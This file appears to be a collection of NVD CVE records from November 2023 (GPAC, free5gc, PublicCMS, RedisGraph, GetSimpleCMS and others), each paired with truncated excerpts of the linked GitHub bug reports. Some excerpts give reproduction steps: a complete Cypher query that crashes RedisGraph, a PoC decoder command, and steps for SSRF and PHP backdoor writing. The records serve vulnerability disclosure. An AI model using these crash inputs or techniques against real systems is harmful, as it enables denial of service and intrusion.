Permission Vulnerability of Path /xxl-job-admin/joblog/clearLog & /xxl-job-admin/joblog/logDetailCat
https://api.github.com/repos/xuxueli/xxl-job/issues/3330/comments
3
2023-11-08T02:32:23Z
2025-01-08T15:13:33Z
https://github.com/xuxueli/xxl-job/issues/3330
1,982,605,023
3,330
5,745
CVE-2023-48088
2023-11-15T15:15:07.510
xxl-job-admin 2.4.0 is vulnerable to Cross Site Scripting (XSS) via /xxl-job-admin/joblog/logDetailPage.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/xuxueli/xxl-job/issues/3329" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/xuxueli...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:xuxueli:xxl-job:2.4.0:*:*:*:*:*:*:*", "matchCriteriaId": "122ECDB6-272C-4B31-907E-E9FFB36305EA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExclud...
[ "79" ]
79
https://github.com/xuxueli/xxl-job/issues/3329
[ "Exploit", "Issue Tracking" ]
github.com
[ "xuxueli", "xxl-job" ]
### Environment MySQL 5.7.44, XXL-Job-Admin 2.4.0 Virtual Machine 1: Ubuntu 22.04.3 (as XXL-Job-Admin) Virtual Machine 2: Ubuntu 22.04.3 (as XXL-Job-Executor) ### Vulnerability Information During the query of /xxl-job-admin/joblog/logDetailPage, the xxl-job-admin will query the related log directly in the machin...
XSS attack appears in /xxl-job-admin/joblog/logDetailPage
https://api.github.com/repos/xuxueli/xxl-job/issues/3329/comments
1
2023-11-08T02:03:54Z
2023-11-23T09:50:55Z
https://github.com/xuxueli/xxl-job/issues/3329
1,982,577,272
3,329
5,746
CVE-2023-48011
2023-11-15T19:15:07.693
GPAC v2.3-DEV-rev566-g50c2ab06f-master was discovered to contain a heap-use-after-free via the flush_ref_samples function at /gpac/src/isomedia/movie_fragments.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrit...
[ { "source": "cve@mitre.org", "tags": [ "Patch" ], "url": "https://github.com/gpac/gpac/commit/c70f49dda4946d6db6aa55588f6a756b76bd84ea" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/gpac/gpac/issues/2611" }...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:2.3-dev-rev566-g50c2ab06f-master:*:*:*:*:*:*:*", "matchCriteriaId": "ECEFB340-26A2-43CD-A8DC-518262E4DC36", "versionEndExcluding": null, "versionEndIncluding": null, ...
[ "416" ]
416
https://github.com/gpac/gpac/issues/2611
[ "Exploit", "Issue Tracking" ]
github.com
[ "gpac", "gpac" ]
# Version ``` $ ./MP4Box -version MP4Box - GPAC version 2.3-DEV-rev566-g50c2ab06f-master ``` # Platform ``` $ uname -a Linux user-GE40-2PC-Dragon-Eyes 6.2.0-33-generic #33~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Thu Sep 7 10:33:52 UTC 2 x86_64 x86_64 x86_64 GNU/Linux ``` # Asan ``` [33m[iso file] extra box ...
heap-use-after-free in ./gpac/src/isomedia/movie_fragments.c:936:37 in flush_ref_samples
https://api.github.com/repos/gpac/gpac/issues/2611/comments
0
2023-10-08T16:10:40Z
2023-10-12T14:08:21Z
https://github.com/gpac/gpac/issues/2611
1,931,883,357
2,611
5,747
CVE-2023-48013
2023-11-15T19:15:07.753
GPAC v2.3-DEV-rev566-g50c2ab06f-master was discovered to contain a double free via the gf_filterpacket_del function at /gpac/src/filter_core/filter.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrit...
[ { "source": "cve@mitre.org", "tags": [ "Patch" ], "url": "https://github.com/gpac/gpac/commit/cd8a95c1efb8f5bfc950b86c2ef77b4c76f6b893" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/gpac/gpac/issues/2612" }...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:2.3-dev-rev566-g50c2ab06f-master:*:*:*:*:*:*:*", "matchCriteriaId": "ECEFB340-26A2-43CD-A8DC-518262E4DC36", "versionEndExcluding": null, "versionEndIncluding": null, ...
[ "415" ]
415
https://github.com/gpac/gpac/issues/2612
[ "Exploit", "Issue Tracking" ]
github.com
[ "gpac", "gpac" ]
# Version ``` $ ./MP4Box -version MP4Box - GPAC version 2.3-DEV-rev566-g50c2ab06f-master ``` # Platform ``` $ uname -a Linux user-GE40-2PC-Dragon-Eyes 6.2.0-33-generic #33~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Thu Sep 7 10:33:52 UTC 2 x86_64 x86_64 x86_64 GNU/Linux ``` # Asan ``` /home/user/vul/MP4Box_cra...
double-free in gf_filterpacket_del /home/user/fuzzing_gpac/gpac/src/filter_core/filter.c:38:17
https://api.github.com/repos/gpac/gpac/issues/2612/comments
0
2023-10-08T16:13:47Z
2023-10-12T14:17:39Z
https://github.com/gpac/gpac/issues/2612
1,931,884,388
2,612
5,748
CVE-2023-48014
2023-11-15T19:15:07.803
GPAC v2.3-DEV-rev566-g50c2ab06f-master was discovered to contain a stack overflow via the hevc_parse_vps_extension function at /media_tools/av_parsers.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrit...
[ { "source": "cve@mitre.org", "tags": [ "Patch" ], "url": "https://github.com/gpac/gpac/commit/66abf0887c89c29a484d9e65e70882794e9e3a1b" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/gpac/gpac/issues/2613" }...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:2.3-dev-rev566-g50c2ab06f-master:*:*:*:*:*:*:*", "matchCriteriaId": "ECEFB340-26A2-43CD-A8DC-518262E4DC36", "versionEndExcluding": null, "versionEndIncluding": null, ...
[ "787" ]
787
https://github.com/gpac/gpac/issues/2613
[ "Exploit", "Issue Tracking" ]
github.com
[ "gpac", "gpac" ]
# Version ``` $ ./MP4Box -version MP4Box - GPAC version 2.3-DEV-rev566-g50c2ab06f-master ``` # Platform ``` $ uname -a Linux user-GE40-2PC-Dragon-Eyes 6.2.0-33-generic #33~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Thu Sep 7 10:33:52 UTC 2 x86_64 x86_64 x86_64 GNU/Linux ``` # Asan ``` /home/user/vul/MP4Box_cra...
stack-buffer-overflow in /gpac/src/media_tools/av_parsers.c:7735:42 in hevc_parse_vps_extension
https://api.github.com/repos/gpac/gpac/issues/2613/comments
0
2023-10-08T16:15:17Z
2023-10-12T14:46:27Z
https://github.com/gpac/gpac/issues/2613
1,931,886,016
2,613
5,749
CVE-2023-47345
2023-11-15T22:15:27.877
Buffer Overflow vulnerability in free5gc 3.3.0 allows attackers to cause a denial of service via crafted PFCP message with malformed PFCP Heartbeat message whose Recovery Time Stamp IE length is mutated to zero.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/free5gc/free5gc/issues/483" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/free5gc/...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:free5gc:free5gc:3.3.0:*:*:*:*:*:*:*", "matchCriteriaId": "89BA8BA8-E366-48F9-930A-91ED1442AAFE", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExclud...
[ "120" ]
120
https://github.com/free5gc/free5gc/issues/483
[ "Exploit", "Issue Tracking" ]
github.com
[ "free5gc", "free5gc" ]
[Bugs] UPF crash caused by malformed PFCP messages whose 1st IE length is mutated to zero ## Describe the bug While fuzzing the free5gc UPF for some PFCP basic and security features, I could trigger several crashes when send malformed PFCP Heartbeat Request whose Recovery Time Stamp IE length is mutated to zero. Th...
[Bugs] UPF crash caused by malformed PFCP messages whose 1st IE length is mutated to zero
https://api.github.com/repos/free5gc/free5gc/issues/483/comments
4
2023-09-22T03:19:07Z
2023-11-26T13:11:19Z
https://github.com/free5gc/free5gc/issues/483
1,908,115,920
483
5,750
CVE-2023-47347
2023-11-15T22:15:27.930
Buffer Overflow vulnerability in free5gc 3.3.0 allows attackers to cause a denial of service via crafted PFCP messages whose Sequence Number is mutated to overflow bytes.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/free5gc/free5gc/issues/496" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/free5gc/...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:free5gc:free5gc:3.3.0:*:*:*:*:*:*:*", "matchCriteriaId": "89BA8BA8-E366-48F9-930A-91ED1442AAFE", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExclud...
[ "120" ]
120
https://github.com/free5gc/free5gc/issues/496
[ "Exploit", "Issue Tracking" ]
github.com
[ "free5gc", "free5gc" ]
[Bugs] UPF crash caused by malformed PFCP message whose Sequence Number is mutated to overflow bytes ## Describe the bug While fuzzing the free5gc UPF for some PFCP basic and security features, I could trigger several crashes when send malformed PFCP Heartbeat Request whose Sequence Number is mutated to overflow by...
[Bugs] UPF crash caused by malformed PFCP messages whose Sequence Number is mutated to overflow bytes
https://api.github.com/repos/free5gc/free5gc/issues/496/comments
1
2023-10-24T11:07:44Z
2023-11-26T13:36:56Z
https://github.com/free5gc/free5gc/issues/496
1,959,013,436
496
5,751
CVE-2023-48204
2023-11-16T00:15:06.770
An issue in PublicCMS v.4.0.202302.e allows a remote attacker to obtain sensitive information via the appToken and Parameters parameter of the api/method/getHtml component.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "inte...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/sanluan/PublicCMS/issues/77" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/sanluan...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:publiccms:publiccms:4.0.202302.e:*:*:*:*:*:*:*", "matchCriteriaId": "696F37D9-7CB7-428B-ADE4-3EB40573111A", "versionEndExcluding": null, "versionEndIncluding": null, "version...
[ "918" ]
918
https://github.com/sanluan/PublicCMS/issues/77
[ "Exploit", "Issue Tracking" ]
github.com
[ "sanluan", "PublicCMS" ]
1.After logging into the backend system,add an application authorization to obtain an appKey and appSecret ![图片](https://github.com/sanluan/PublicCMS/assets/48166761/b0f6e0eb-7a4c-43ea-bd7e-6647bb60e708) 2.Obtain apptoken through the /api/appToken interface with appkey and appsecret ![图片](https://github.com/sanlua...
There is an SSRF vulnerability in publiccms V4.0.202302.e, whice allow attackers to access the website of intranet or detect whether the port is open
https://api.github.com/repos/sanluan/PublicCMS/issues/77/comments
1
2023-11-12T07:38:06Z
2023-12-15T07:40:41Z
https://github.com/sanluan/PublicCMS/issues/77
1,989,279,808
77
5,752
CVE-2023-47471
2023-11-16T04:15:06.857
Buffer Overflow vulnerability in strukturag libde265 v1.10.12 allows a local attacker to cause a denial of service via the slice_segment_header function in the slice.cc component.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "inte...
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Vendor Advisory" ], "url": "https://github.com/strukturag/libde265/commit/e36b4a1b0bafa53df47514c419d5be3e8916ebc7" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Vendor Advisory" ], "url": "ht...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:struktur:libde265:1.0.12:*:*:*:*:*:*:*", "matchCriteriaId": "A736D1CB-9F33-4561-B10C-4074DF6C02F9", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExc...
[ "120" ]
120
https://github.com/strukturag/libde265/issues/426
[ "Issue Tracking", "Vendor Advisory" ]
github.com
[ "strukturag", "libde265" ]
# SEGV in libde265 ### Description Libde265 v1.0.12 was discovered to contain a SEGV via the function slice_segment_header::dump_slice_segment_header at slice.cc. ### Version ```shell libde265/dec265 v1.0.12 ``` ### ASAN Log ./dec265/dec265 -c -d -f 153 poc1libde265 ```shell AddressSanitizer:DE...
SEGV in libde265 in slice_segment_header::dump_slice_segment_header
https://api.github.com/repos/strukturag/libde265/issues/426/comments
1
2023-11-03T17:48:11Z
2023-11-07T07:21:53Z
https://github.com/strukturag/libde265/issues/426
1,976,666,798
426
5,753
CVE-2023-47003
2023-11-16T05:15:29.927
An issue in RedisGraph v.2.12.10 allows an attacker to execute arbitrary code and cause a denial of service via a crafted string in DataBlock_ItemIsDeleted.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "in...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/RedisGraph/RedisGraph/issues/3063" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "T...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:redislabs:redisgraph:2.12.10:*:*:*:*:*:*:*", "matchCriteriaId": "18654D3D-CA97-42DC-8D99-092344B58052", "versionEndExcluding": null, "versionEndIncluding": null, "versionStar...
[ "476" ]
476
https://github.com/RedisGraph/RedisGraph/issues/3063
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "RedisGraph", "RedisGraph" ]
When running the following query: ```cypher CREATE (x) CREATE ()-[:A{n1:size([n2 IN [n3 IN [0] | x.n4] | 0])}]->()-[y:B]->() DELETE y ``` The RedisGraph instance crashes due to a null-pointer dereference. I encountered this issue when testing queries against **RedisGraph v2.12.0** compiled with address sanitiz...
Query crashes in `DataBlock_ItemIsDeleted`
https://api.github.com/repos/RedisGraph/RedisGraph/issues/3063/comments
0
2023-04-24T19:16:03Z
2023-04-24T19:16:03Z
https://github.com/RedisGraph/RedisGraph/issues/3063
1,681,876,852
3,063
5,754
CVE-2023-47025
2023-11-16T23:15:08.123
An issue in Free5gc v.3.3.0 allows a local attacker to cause a denial of service via the free5gc-compose component.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/free5gc/free5gc/issues/501" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/free5gc/...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:free5gc:free5gc:3.3.0:*:*:*:*:*:*:*", "matchCriteriaId": "89BA8BA8-E366-48F9-930A-91ED1442AAFE", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExclud...
[ "400" ]
400
https://github.com/free5gc/free5gc/issues/501
[ "Exploit", "Issue Tracking" ]
github.com
[ "free5gc", "free5gc" ]
## Describe the bug When I try to send a captured UE registration request message to the AMF, the log shows 'sctp accept from <nil>,' and the AMF crashes, causing disconnection for other UEs as well. ## To Reproduce Steps to reproduce the behavior: 1. Using free5gc-compose to establish the AMF. 2. run free5gc ...
[Bugs]Amf crashed when failed to resolve the IP of ngap message , resulting in a null pointer reference.
https://api.github.com/repos/free5gc/free5gc/issues/501/comments
1
2023-10-29T12:48:07Z
2023-12-04T08:48:37Z
https://github.com/free5gc/free5gc/issues/501
1,966,977,323
501
5,755
CVE-2023-48024
2023-11-17T17:15:07.893
Liblisp through commit 4c65969 was discovered to contain a use-after-free vulnerability in void hash_destroy(hash_table_t *h) at hash.c
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "inte...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/howerj/liblisp/issues/1" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/howerj/libl...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:howerj:liblisp:*:*:*:*:*:*:*:*", "matchCriteriaId": "26CB9D0F-FF32-4225-84A4-B594E2F3ADEA", "versionEndExcluding": null, "versionEndIncluding": "2019-02-08", "versionStartExc...
[ "416" ]
416
https://github.com/howerj/liblisp/issues/1
[ "Exploit", "Issue Tracking" ]
github.com
[ "howerj", "liblisp" ]
# Overview Hi there @howerj! I love the library and per usual I ran my fuzz tests in the background and found just a couple of memory corruption bugs in liblisp through 4c65969. I have included all of the files necessary for reproducing each bug. If I get some time I'll work on submitting a pull request. * Us...
Memory Corruption Bugs in Liblisp through commit 4c65969
https://api.github.com/repos/howerj/liblisp/issues/1/comments
1
2023-11-06T17:11:22Z
2023-11-14T19:21:28Z
https://github.com/howerj/liblisp/issues/1
1,979,643,796
1
5,756
CVE-2023-6188
2023-11-17T18:15:07.150
A vulnerability was found in GetSimpleCMS 3.3.16/3.4.0a. It has been rated as critical. This issue affects some unknown processing of the file /admin/theme-edit.php. The manipulation leads to code injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associat...
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "MULTIPLE", "availabilityImpact": "PARTIAL", "baseScore": 5.8, "confidentialityImpact": "PAR...
[ { "source": "cna@vuldb.com", "tags": [ "Exploit" ], "url": "https://github.com/GetSimpleCMS/GetSimpleCMS/issues/1352" }, { "source": "cna@vuldb.com", "tags": [ "Exploit" ], "url": "https://github.com/GetSimpleCMS/GetSimpleCMS/issues/1358" }, { "source": "cna@v...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:get-simple:getsimplecms:3.3.16:*:*:*:*:*:*:*", "matchCriteriaId": "C4E0FD65-B030-462F-86BA-6CB5EDC80FE8", "versionEndExcluding": null, "versionEndIncluding": null, "versionSt...
[ "94" ]
94
https://github.com/GetSimpleCMS/GetSimpleCMS/issues/1358
[ "Exploit" ]
github.com
[ "GetSimpleCMS", "GetSimpleCMS" ]
There is a remote code execution vulnerability in GetSimpleCMS 3.4.0a version, the specific location is GetSimpleCMS/admin/theme-edit.php Although this version fixes the problem raised by #1352, if you directly modify the template file, you also can write the PHP backdoor. For example ![Screenshot 2023-11-09 at 15 4...
Remote command executioin vulnerability in 3.4.0a
https://api.github.com/repos/GetSimpleCMS/GetSimpleCMS/issues/1358/comments
0
2023-11-09T08:08:10Z
2024-04-19T02:36:20Z
https://github.com/GetSimpleCMS/GetSimpleCMS/issues/1358
1,985,053,712
1,358
5,757
CVE-2023-44796
2023-11-18T00:15:07.133
Cross Site Scripting (XSS) vulnerability in LimeSurvey before version 6.2.9-230925 allows a remote attacker to escalate privileges via a crafted script to the _generaloptions_panel.php component.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integ...
[ { "source": "cve@mitre.org", "tags": [ "Exploit" ], "url": "https://github.com/Hebing123/CVE-2023-44796/issues/1" }, { "source": "cve@mitre.org", "tags": null, "url": "https://github.com/Hebing123/cve/issues/4" }, { "source": "cve@mitre.org", "tags": [ "Patch"...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:limesurvey:limesurvey:*:*:*:*:*:*:*:*", "matchCriteriaId": "05741E6D-3E8F-43BE-9EF7-4C535AAD6C3B", "versionEndExcluding": "6.2.9", "versionEndIncluding": null, "versionStartE...
[ "79" ]
79
https://github.com/Hebing123/cve/issues/4
null
github.com
[ "Hebing123", "cve" ]
**LimeSurvey 6.2.9-230925 has a storage based XSS vulnerability caused by importManifest in [limesurvey/limesurvey](https://huntr.com/repos/limesurvey/limesurvey)** ### **Description** A regular user with "theme" privileges who maliciously sets the "templatename" during the importManifest process can lead to a stor...
LimeSurvey 6.2.9-230925 has a storage based XSS vulnerability caused by importManifest in limesurvey/limesurvey
https://api.github.com/repos/Hebing123/cve/issues/4/comments
1
2023-12-14T03:31:28Z
2024-03-11T06:23:47Z
https://github.com/Hebing123/cve/issues/4
2,040,839,627
4
5,758
CVE-2023-48039
2023-11-20T15:15:09.820
GPAC 2.3-DEV-rev617-g671976fcc-master is vulnerable to memory leak in gf_mpd_parse_string media_tools/mpd.c:75.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Vendor Advisory" ], "url": "https://github.com/gpac/gpac/issues/2679" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Vendor Advisory" ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:2.3-dev-rev617-g671976fcc-master:*:*:*:*:*:*:*", "matchCriteriaId": "F540C691-D615-4A9B-8DD6-69B8488E3BA1", "versionEndExcluding": null, "versionEndIncluding": null, ...
[ "401" ]
401
https://github.com/gpac/gpac/issues/2679
[ "Exploit", "Issue Tracking", "Vendor Advisory" ]
github.com
[ "gpac", "gpac" ]
1.Version ./MP4Box -version MP4Box - GPAC version 2.3-DEV-rev617-g671976fcc-master (c) 2000-2023 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io/ Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configu...
memory leaks in gf_mpd_parse_string media_tools/mpd.c:75
https://api.github.com/repos/gpac/gpac/issues/2679/comments
0
2023-11-07T02:35:25Z
2023-12-04T10:07:49Z
https://github.com/gpac/gpac/issues/2679
1,980,426,267
2,679
5,759
CVE-2023-48090
2023-11-20T15:15:09.863
GPAC 2.3-DEV-rev617-g671976fcc-master is vulnerable to memory leaks in extract_attributes media_tools/m3u8.c:329.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.1, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrit...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Vendor Advisory" ], "url": "https://github.com/gpac/gpac/issues/2680" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Vendor Advisory" ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:2.3-dev-rev617-g671976fcc-master:*:*:*:*:*:*:*", "matchCriteriaId": "F540C691-D615-4A9B-8DD6-69B8488E3BA1", "versionEndExcluding": null, "versionEndIncluding": null, ...
[ "401" ]
401
https://github.com/gpac/gpac/issues/2680
[ "Exploit", "Issue Tracking", "Vendor Advisory" ]
github.com
[ "gpac", "gpac" ]
1.Version ./MP4Box -version MP4Box - GPAC version 2.3-DEV-rev617-g671976fcc-master (c) 2000-2023 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io/ Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configu...
memory leaks in extract_attributes media_tools/m3u8.c:329
https://api.github.com/repos/gpac/gpac/issues/2680/comments
0
2023-11-07T07:24:45Z
2023-12-04T10:07:50Z
https://github.com/gpac/gpac/issues/2680
1,980,712,658
2,680
5,760
CVE-2023-48300
2023-11-20T19:15:09.063
The `Embed Privacy` plugin for WordPress that prevents the loading of embedded external content is vulnerable to Stored Cross-Site Scripting via `embed_privacy_opt_out` shortcode in versions up to, and including, 1.8.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it...
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 6.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integr...
[ { "source": "security-advisories@github.com", "tags": [ "Exploit" ], "url": "https://d.pr/v/ORuIat" }, { "source": "security-advisories@github.com", "tags": [ "Patch" ], "url": "https://github.com/epiphyt/embed-privacy/commit/f80929992b2a5a66f4f4953cd6f46cc227154a5c" ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:epiph:embed_privacy:*:*:*:*:*:wordpress:*:*", "matchCriteriaId": "A1422C6B-88AD-4A05-B4BA-3B2BDC88842B", "versionEndExcluding": "1.8.1", "versionEndIncluding": null, "version...
[ "79" ]
79
https://github.com/epiphyt/embed-privacy/issues/199
[ "Issue Tracking" ]
github.com
[ "epiphyt", "embed-privacy" ]
### Bug/Problem The `show_all` property in the opt-out shortcode may execute unwanted code. ### Steps to reproduce … ### Version 1.8.0 ### Link _No response_ ### Environment info _No response_ ### Code of Conduct - [X] I agree to follow this project's Code of Conduct
Fix sanitizing in show_all shortcode attribute
https://api.github.com/repos/epiphyt/embed-privacy/issues/199/comments
0
2023-11-01T15:43:56Z
2023-11-01T15:50:16Z
https://github.com/epiphyt/embed-privacy/issues/199
1,972,624,548
199
5,761
CVE-2023-46990
2023-11-20T20:15:07.407
Deserialization of Untrusted Data in PublicCMS v.4.0.202302.e allows a remote attacker to execute arbitrary code via a crafted script to the writeReplace function.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "in...
[ { "source": "cve@mitre.org", "tags": [ "Exploit" ], "url": "https://github.com/sanluan/PublicCMS/issues/76#issue-1960443408" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit" ], "url": "https://github.com/sanluan/PublicCMS/issues/76#issue-1960...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:publiccms:publiccms:4.0.202302.e:*:*:*:*:*:*:*", "matchCriteriaId": "696F37D9-7CB7-428B-ADE4-3EB40573111A", "versionEndExcluding": null, "versionEndIncluding": null, "version...
[ "502" ]
502
https://github.com/sanluan/PublicCMS/issues/76#issue-1960443408
[ "Exploit" ]
github.com
[ "sanluan", "PublicCMS" ]
Hello,I found a Deserialization vulnerability in the lastest version of PublicCMS- V4.0.202302.e The prerequisite for this vulnerability is that the website uses redis cache and needs to obtain redis control permission to initiate deserialization, because redis will trigger deserialization when obtaining the value t...
Trigger deserialization rce through redis cache
https://api.github.com/repos/sanluan/PublicCMS/issues/76/comments
1
2023-10-25T03:09:30Z
2024-12-26T06:39:55Z
https://github.com/sanluan/PublicCMS/issues/76
1,960,443,408
76
5,762
CVE-2023-48051
2023-11-20T23:15:06.550
An issue in /upydev/keygen.py in upydev v0.4.3 allows attackers to decrypt sensitive information via weak encryption padding.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integr...
